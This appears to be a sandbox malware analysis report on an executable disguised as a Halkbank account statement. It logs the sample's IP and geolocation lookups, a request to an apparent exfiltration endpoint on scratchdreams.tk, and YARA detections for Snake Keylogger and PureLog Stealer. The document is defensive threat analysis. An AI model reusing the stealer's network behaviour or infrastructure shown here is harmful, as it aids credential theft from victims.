May 2, 2024 11:54:53.084842920 CEST | 1.1.1.1 | 192.168.2.5 | 0xff48 | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
May 2, 2024 11:54:53.084842920 CEST | 1.1.1.1 | 192.168.2.5 | 0xff48 | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
May 2, 2024 11:54:55.261873960 CEST | 1.1.1.1 | 192.168.2.5 | 0x8b83 | No error (0) | reallyfreegeoip.org | | 172.67.177.134 | A (IP address) | IN (0x0001) | false
May 2, 2024 11:54:55.261873960 CEST | 1.1.1.1 | 192.168.2.5 | 0x8b83 | No error (0) | reallyfreegeoip.org | | 104.21.67.152 | A (IP address) | IN (0x0001) | false
May 2, 2024 11:55:12.053781033 CEST | 1.1.1.1 | 192.168.2.5 | 0x1e7e | No error (0) | scratchdreams.tk | | 104.21.27.85 | A (IP address) | IN (0x0001) | false
May 2, 2024 11:55:12.053781033 CEST | 1.1.1.1 | 192.168.2.5 | 0x1e7e | No error (0) | scratchdreams.tk | | 172.67.169.18 | A (IP address) | IN (0x0001) | false
                                                            • reallyfreegeoip.org
                                                            • scratchdreams.tk
                                                            • checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49706 | 132.226.247.73 | 80 | 6052 | C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe
Timestamp | Bytes transferred | Direction | Data
May 2, 2024 11:54:53.320055008 CEST | 151 | OUT | GET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
May 2, 2024 11:54:53.516165018 CEST | 323 | IN | HTTP/1.1 200 OK
                                                            Date: Thu, 02 May 2024 09:54:53 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 83c95c913fbc6af9a6605bddda3415d0
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.150.225</body></html>
May 2, 2024 11:54:54.891679049 CEST | 127 | OUT | GET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
May 2, 2024 11:54:55.088221073 CEST | 323 | IN | HTTP/1.1 200 OK
                                                            Date: Thu, 02 May 2024 09:54:54 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: b1bedc95d83f06c118f34fb4f02f0cf7
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.150.225</body></html>
May 2, 2024 11:54:55.885077000 CEST | 127 | OUT | GET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
May 2, 2024 11:54:56.081897974 CEST | 323 | IN | HTTP/1.1 200 OK
                                                            Date: Thu, 02 May 2024 09:54:55 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 047f6a8b09beb87a8c9ce24e9e8f69e9
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.150.225</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49710 | 132.226.247.73 | 80 | 6052 | C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe
Timestamp | Bytes transferred | Direction | Data
May 2, 2024 11:54:56.737152100 CEST | 127 | OUT | GET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
May 2, 2024 11:54:56.935266972 CEST | 323 | IN | HTTP/1.1 200 OK
                                                            Date: Thu, 02 May 2024 09:54:56 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: d9447c882bc6797db6594f3f567d575e
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.150.225</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49713 | 132.226.247.73 | 80 | 6052 | C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe
Timestamp | Bytes transferred | Direction | Data
May 2, 2024 11:54:57.545845032 CEST | 151 | OUT | GET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
May 2, 2024 11:54:57.780755043 CEST | 323 | IN | HTTP/1.1 200 OK
                                                            Date: Thu, 02 May 2024 09:54:57 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 7834562fff9685365a390e8090b21857
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.150.225</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49716 | 132.226.247.73 | 80 | 6052 | C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe
Timestamp | Bytes transferred | Direction | Data
May 2, 2024 11:54:58.397499084 CEST | 151 | OUT | GET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
May 2, 2024 11:54:58.593482971 CEST | 323 | IN | HTTP/1.1 200 OK
                                                            Date: Thu, 02 May 2024 09:54:58 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 1e73ae924655a604c394604c99b21b80
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.150.225</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49718 | 132.226.247.73 | 80 | 6052 | C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe
Timestamp | Bytes transferred | Direction | Data
May 2, 2024 11:55:00.060322046 CEST | 151 | OUT | GET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
May 2, 2024 11:55:00.257428885 CEST | 323 | IN | HTTP/1.1 200 OK
                                                            Date: Thu, 02 May 2024 09:55:00 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: 28814ef55075da41f4f36dcd047f475f
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.150.225</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49720 | 132.226.247.73 | 80 | 6052 | C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe
Timestamp | Bytes transferred | Direction | Data
May 2, 2024 11:55:00.916456938 CEST | 151 | OUT | GET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
May 2, 2024 11:55:04.476000071 CEST | 323 | IN | HTTP/1.1 200 OK
                                                            Date: Thu, 02 May 2024 09:55:04 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: e07378151365a0cd8a498a9b44b2acef
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.150.225</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49722 | 132.226.247.73 | 80 | 6052 | C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe
Timestamp | Bytes transferred | Direction | Data
May 2, 2024 11:55:05.148523092 CEST | 151 | OUT | GET / HTTP/1.1
                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                            Host: checkip.dyndns.org
                                                            Connection: Keep-Alive
May 2, 2024 11:55:11.466059923 CEST | 323 | IN | HTTP/1.1 200 OK
                                                            Date: Thu, 02 May 2024 09:55:11 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 106
                                                            Connection: keep-alive
                                                            Cache-Control: no-cache
                                                            Pragma: no-cache
                                                            X-Request-ID: aa35b04f9faca5352cc7c974dc6d2e3e
                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 191.96.150.225</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49708 | 172.67.177.134 | 443 | 6052 | C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe
Timestamp | Bytes transferred | Direction | Data
2024-05-02 09:54:55 UTC | 87 | OUT | GET /xml/191.96.150.225 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-05-02 09:54:55 UTC706INHTTP/1.1 200 OK
                                                            Date: Thu, 02 May 2024 09:54:55 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 14579
                                                            Last-Modified: Thu, 02 May 2024 05:51:56 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xKqt2sPUhrewvhw1WwWKlkeM%2FniftMsoojetJqM3GivStNFHvZTQsJBPIIXb7ldlo8WKSngJJ4SQyKJdB%2Ft3htrAibl5dUEFanwRz2KmgaSDfYH7GvQxRjdR4MzQN8CdOjx%2BOGRF"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 87d721fade2c1891-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-05-02 09:54:55 UTC | 369 | IN |
                                                            Data Ascii: 16a<Response><IP>191.96.150.225</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>IL</RegionCode><RegionName>Illinois</RegionName><City>Chicago</City><ZipCode>60602</ZipCode><TimeZone>America/Chicago</T
                                                            2024-05-02 09:54:55 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            1 | 192.168.2.5 | 49709 | 172.67.177.134 | 443 | 6052 | C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-05-02 09:54:56 UTC | 63 | OUT | GET /xml/191.96.150.225 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            2024-05-02 09:54:56 UTC | 720 | IN | HTTP/1.1 200 OK
                                                            Date: Thu, 02 May 2024 09:54:56 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 14580
                                                            Last-Modified: Thu, 02 May 2024 05:51:56 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IkwLqGN3tpkR22OHGZkAi%2FPL8SW1XNN6F8G0N%2FWNoP1bb%2BJ%2BMOy0OL7K0cOY9TrV0av469OW%2F8Zu9n%2FUE%2BP4Cd46%2BnPD%2Fo89eJBN%2BC7DFnSwAV3q3VVWJfjM7CDQ88VMWgoGiCpm"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 87d721ff09fd4233-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-05-02 09:54:56 UTC | 369 | IN |
                                                            Data Ascii: 16a<Response><IP>191.96.150.225</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>IL</RegionCode><RegionName>Illinois</RegionName><City>Chicago</City><ZipCode>60602</ZipCode><TimeZone>America/Chicago</T
                                                            2024-05-02 09:54:56 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            2 | 192.168.2.5 | 49711 | 172.67.177.134 | 443 | 6052 | C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-05-02 09:54:57 UTC | 87 | OUT | GET /xml/191.96.150.225 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-05-02 09:54:57 UTC | 710 | IN | HTTP/1.1 200 OK
                                                            Date: Thu, 02 May 2024 09:54:57 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 14581
                                                            Last-Modified: Thu, 02 May 2024 05:51:56 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kQpgeJqd1p%2FryGfqOVqxJLgwGJIwgEF4evXgILmdOTr1K5dI0vbj2W2vXP7GmtCtn%2FEAzB%2BMsQ9znYStrmDEvoBy5BrugJeRQKbGwU4jVDAjL%2BqlDbl%2F7qCQLAzlHdvxKlUG7IpK"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 87d722040a31c333-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-05-02 09:54:57 UTC | 369 | IN |
                                                            Data Ascii: 16a<Response><IP>191.96.150.225</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>IL</RegionCode><RegionName>Illinois</RegionName><City>Chicago</City><ZipCode>60602</ZipCode><TimeZone>America/Chicago</T
                                                            2024-05-02 09:54:57 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            3 | 192.168.2.5 | 49714 | 172.67.177.134 | 443 | 6052 | C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-05-02 09:54:57 UTC | 87 | OUT | GET /xml/191.96.150.225 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-05-02 09:54:58 UTC | 702 | IN | HTTP/1.1 200 OK
                                                            Date: Thu, 02 May 2024 09:54:58 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 14582
                                                            Last-Modified: Thu, 02 May 2024 05:51:56 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TI2vwNfrOF88E6MuWIYXYM1OzZYPVxDzz0I3uJQSzs6IEjKQDe1C1wfvX1akEeUSLYFBZvx%2FjGE2Idrn0PrvBDXd3T8p0kgwRaUBImaDnKnAqWw2gy7kn1yqGJ9jzqb247Toez86"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 87d7220959a532c7-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-05-02 09:54:58 UTC | 369 | IN |
                                                            Data Ascii: 16a<Response><IP>191.96.150.225</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>IL</RegionCode><RegionName>Illinois</RegionName><City>Chicago</City><ZipCode>60602</ZipCode><TimeZone>America/Chicago</T
                                                            2024-05-02 09:54:58 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            4 | 192.168.2.5 | 49717 | 172.67.177.134 | 443 | 6052 | C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-05-02 09:54:59 UTC | 63 | OUT | GET /xml/191.96.150.225 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            2024-05-02 09:54:59 UTC | 708 | IN | HTTP/1.1 200 OK
                                                            Date: Thu, 02 May 2024 09:54:59 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 14583
                                                            Last-Modified: Thu, 02 May 2024 05:51:56 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HVTiUbgkGxjh3vYU%2FPPN9yXsGcs6orsOZ9vubmyIir72n%2F5%2F8qNEHQp5RZTZJrnfA8XVHszTZvTY9h3IFtLoGhpaDiZjPakvciQU33yslDNUDMpmiHPdp5m5%2Bb8iudoJ7y9lc7cw"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 87d722121aa9431b-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-05-02 09:54:59 UTC | 369 | IN |
                                                            Data Ascii: 16a<Response><IP>191.96.150.225</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>IL</RegionCode><RegionName>Illinois</RegionName><City>Chicago</City><ZipCode>60602</ZipCode><TimeZone>America/Chicago</T
                                                            2024-05-02 09:54:59 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            5 | 192.168.2.5 | 49719 | 172.67.177.134 | 443 | 6052 | C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-05-02 09:55:00 UTC | 87 | OUT | GET /xml/191.96.150.225 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-05-02 09:55:00 UTC | 706 | IN | HTTP/1.1 200 OK
                                                            Date: Thu, 02 May 2024 09:55:00 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 14584
                                                            Last-Modified: Thu, 02 May 2024 05:51:56 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FSuqTy18t0dWcFVLTHuexjBFtJjZK49LF0LTVuppKT7XzjRh8cmPlO4tDIxRhkdNvhLQ5Wd9%2FvN9PoArWbCdQtwec7TGbo3KeyTIQWLxgNiUdn4tH1q9o%2FZVgbgtcbK6sqb7MBbZ"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 87d72218fcc343a3-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-05-02 09:55:00 UTC | 369 | IN |
                                                            Data Ascii: 16a<Response><IP>191.96.150.225</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>IL</RegionCode><RegionName>Illinois</RegionName><City>Chicago</City><ZipCode>60602</ZipCode><TimeZone>America/Chicago</T
                                                            2024-05-02 09:55:00 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            6 | 192.168.2.5 | 49721 | 172.67.177.134 | 443 | 6052 | C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-05-02 09:55:04 UTC | 87 | OUT | GET /xml/191.96.150.225 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            Connection: Keep-Alive
                                                            2024-05-02 09:55:04 UTC | 700 | IN | HTTP/1.1 200 OK
                                                            Date: Thu, 02 May 2024 09:55:04 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 14588
                                                            Last-Modified: Thu, 02 May 2024 05:51:56 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ngCvVCNRH96VG8ovf4to1DBQDCuAa2EVnfwXuZHfraofkZDxmRmTN3omRWRRdFyuAThNfvnutsT83s05AvDSCxUSjINWBwxBOxoeQzgQ3Bq5ljJjn1mtwREGrUTglKolE4RQYfCr"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 87d722338fe87d1a-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-05-02 09:55:04 UTC | 369 | IN |
                                                            Data Ascii: 16a<Response><IP>191.96.150.225</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>IL</RegionCode><RegionName>Illinois</RegionName><City>Chicago</City><ZipCode>60602</ZipCode><TimeZone>America/Chicago</T
                                                            2024-05-02 09:55:04 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            7 | 192.168.2.5 | 49723 | 172.67.177.134 | 443 | 6052 | C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-05-02 09:55:11 UTC | 63 | OUT | GET /xml/191.96.150.225 HTTP/1.1
                                                            Host: reallyfreegeoip.org
                                                            2024-05-02 09:55:11 UTC | 704 | IN | HTTP/1.1 200 OK
                                                            Date: Thu, 02 May 2024 09:55:11 GMT
                                                            Content-Type: application/xml
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            access-control-allow-origin: *
                                                            vary: Accept-Encoding
                                                            Cache-Control: max-age=86400
                                                            CF-Cache-Status: HIT
                                                            Age: 14595
                                                            Last-Modified: Thu, 02 May 2024 05:51:56 GMT
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qqTE9TB%2FDl5P4MrRfi8vbLIg1LdRvstWOAPDxpspCEqMWXpkVcEEraOTyMY9vrQlXqIWJVk3e2BfxxLXWXR4Vnr28MyvjnjCWjZowBr%2BOFoyj4j0gaPB1759FMPpKC5MLz4UFq5a"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 87d7225edfa14270-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-05-02 09:55:11 UTC | 369 | IN |
                                                            Data Ascii: 16a<Response><IP>191.96.150.225</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>IL</RegionCode><RegionName>Illinois</RegionName><City>Chicago</City><ZipCode>60602</ZipCode><TimeZone>America/Chicago</T
                                                            2024-05-02 09:55:11 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            8 | 192.168.2.5 | 49726 | 104.21.27.85 | 443 | 6052 | C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            2024-05-02 09:55:12 UTC | 79 | OUT | GET /_send_.php?TS HTTP/1.1
                                                            Host: scratchdreams.tk
                                                            Connection: Keep-Alive
                                                            2024-05-02 09:55:47 UTC | 737 | IN | HTTP/1.1 522
                                                            Date: Thu, 02 May 2024 09:55:47 GMT
                                                            Content-Type: text/plain; charset=UTF-8
                                                            Content-Length: 15
                                                            Connection: close
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pDEb%2FtHtsURGK2SUSrCw0D9oOsujuoWrKBo1Ba1I9YM1MQJLns4YamWO9wdFVlvEHPowkksd1PypE9Lql9SHxmkxatlCd664%2BK9BjSnW%2B%2FYKfnkmxW353mdcloY6WA1TNw9R"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            X-Frame-Options: SAMEORIGIN
                                                            Referrer-Policy: same-origin
                                                            Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                            Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                            Server: cloudflare
                                                            CF-RAY: 87d72262aebf43a9-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2024-05-02 09:55:47 UTC | 15 | IN | Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32
                                                            Data Ascii: error code: 522



                                                            Target ID:0
                                                            Start time:11:54:50
                                                            Start date:02/05/2024
                                                            Path:C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe"
                                                            Imagebase:0x300000
                                                            File size:877'056 bytes
                                                            MD5 hash:42199F4A8E3D9FE6CE26A7D4922AFEC7
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2002086129.0000000006C00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1980117407.0000000002771000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1981077702.000000000394E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000000.00000002.1981077702.000000000394E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.1981077702.000000000394E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000000.00000002.1981077702.000000000394E000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1980117407.0000000002813000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:3
                                                            Start time:11:54:52
                                                            Start date:02/05/2024
                                                            Path:C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\Halkbank_Ekstre_20230426_075819_154055.exe"
                                                            Imagebase:0x5a0000
                                                            File size:877'056 bytes
                                                            MD5 hash:42199F4A8E3D9FE6CE26A7D4922AFEC7
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3219783954.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.3219783954.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000003.00000002.3219783954.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
